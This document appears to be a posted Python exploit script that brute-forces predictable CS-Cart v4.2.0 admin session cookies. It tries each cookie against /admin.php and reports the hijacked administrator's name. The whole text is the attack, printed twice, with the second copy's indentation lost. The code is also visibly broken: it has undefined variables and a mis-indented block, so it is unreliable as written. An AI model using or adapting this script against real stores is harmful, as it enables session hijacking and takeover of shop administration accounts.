nikcub/cscart-exploit.py

## cscart-exploit.py
#!/usr/bin/env python
# CS-Cart session brute force exploit for v4.2.0
# see https://www.nikcub.com/posts/cs-cart-v4-2-0-session-hijacking-and-other-vulnerabilities/

import sys
import requests
import argparse
import re
import string
import random
import hashlib

from BeautifulSoup import BeautifulSoup

target_host = "cscart.dev"
target_ua = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:20.0) Gecko/20100101 Firefox/20.0"
target_start_time = 1402325013 # timestamp seconds set to when link was clicked + 3-4 seconds for login.

# change nothing below.

session_name = False
session_value = False
cookies = {}


headers = {
  "Host": target_host,
  "User-Agent": target_ua,
  "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
  "Accept-Language": "en-US,en;q=0.5",
  "Accept-Encoding": "gzip, deflate"
}


proxies = proxy_none
req_base = 'http://' + host
req_url = req_base + '/admin.php'

def extract_username(html_doc):
  soup = BeautifulSoup(html_doc)
  menu = soup.find("ul", "dropdown-menu pull-right").find("li").find("a")
  if menu:
    return re.search(r'<br />(.*?)</a>', str(menu), re.DOTALL).group(1).strip()
  return 'Not Found'

def rand_string(n=5):
  return ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(n))

def save_doc(tid, txt):
  f = open(tid + '_' + rand_string() + '.txt', 'w')
  f.write(txt.encode('ascii', 'ignore'))
  f.close()

def req_att(path, cookie):
  cookies[session_name] = cookie
  r = requests.get(req_base + path, headers=headers, allow_redirects=False)

def calc_session_name(host):
  return hashlib.md5(host).hexdigest()[:5]

def gen_value(basetime, usec):
  return hashlib.md5("%s%08x%05x" % (basetime, basetime, usec)).hexdigest() + "_0_A"

def req_generator(startat):
  usec = 0
  startat = startat
  while True:
    r = gen_value(startat, usec)
    usec += 1
    if (usec%10000) == 0:
      #  print progress every 100000
      print '.'
    if usec >= 100000:
      usec = 0
      startat += 1
    yield r

session_name = calc_session_name(req_base)

def fetch(cookie):
  # cookies = {cookie_name, cookie}
  headers['Cookie'] = cookie_name + '=' + cookie
  try:
    response = requests.request('GET', req_url, headers=headers, proxies=proxies, timeout=30.0, allow_redirects=False)
    if response.status_code != 302:
    print "FOUND: " + session_name + "=" + session_guess
    save_doc(host + '_' + session_guess, "\n".join(r.headers) + "\n" + r.text)
    print "Wrote file backup"
    print "Signed in as: " + extract_username(r.text)
  except Exception, e:
    pass

for url in req_generator(target_start_time):
  fetch(url)
	#!/usr/bin/env python
	# CS-Cart session brute force exploit for v4.2.0
	# see https://www.nikcub.com/posts/cs-cart-v4-2-0-session-hijacking-and-other-vulnerabilities/

	import sys
	import requests
	import argparse
	import re
	import string
	import random
	import hashlib

	from BeautifulSoup import BeautifulSoup

	target_host = "cscart.dev"
	target_ua = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:20.0) Gecko/20100101 Firefox/20.0"
	target_start_time = 1402325013 # timestamp seconds set to when link was clicked + 3-4 seconds for login.

	# change nothing below.

	session_name = False
	session_value = False
	cookies = {}


	headers = {
	"Host": target_host,
	"User-Agent": target_ua,
	"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8",
	"Accept-Language": "en-US,en;q=0.5",
	"Accept-Encoding": "gzip, deflate"
	}


	proxies = proxy_none
	req_base = 'http://' + host
	req_url = req_base + '/admin.php'

	def extract_username(html_doc):
	soup = BeautifulSoup(html_doc)
	menu = soup.find("ul", "dropdown-menu pull-right").find("li").find("a")
	if menu:
	return re.search(r'<br />(.*?)</a>', str(menu), re.DOTALL).group(1).strip()
	return 'Not Found'

	def rand_string(n=5):
	return ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(n))

	def save_doc(tid, txt):
	f = open(tid + '_' + rand_string() + '.txt', 'w')
	f.write(txt.encode('ascii', 'ignore'))
	f.close()

	def req_att(path, cookie):
	cookies[session_name] = cookie
	r = requests.get(req_base + path, headers=headers, allow_redirects=False)

	def calc_session_name(host):
	return hashlib.md5(host).hexdigest()[:5]

	def gen_value(basetime, usec):
	return hashlib.md5("%s%08x%05x" % (basetime, basetime, usec)).hexdigest() + "_0_A"

	def req_generator(startat):
	usec = 0
	startat = startat
	while True:
	r = gen_value(startat, usec)
	usec += 1
	if (usec%10000) == 0:
	# print progress every 100000
	print '.'
	if usec >= 100000:
	usec = 0
	startat += 1
	yield r

	session_name = calc_session_name(req_base)

	def fetch(cookie):
	# cookies = {cookie_name, cookie}
	headers['Cookie'] = cookie_name + '=' + cookie
	try:
	response = requests.request('GET', req_url, headers=headers, proxies=proxies, timeout=30.0, allow_redirects=False)
	if response.status_code != 302:
	print "FOUND: " + session_name + "=" + session_guess
	save_doc(host + '_' + session_guess, "\n".join(r.headers) + "\n" + r.text)
	print "Wrote file backup"
	print "Signed in as: " + extract_username(r.text)
	except Exception, e:
	pass

	for url in req_generator(target_start_time):
	fetch(url)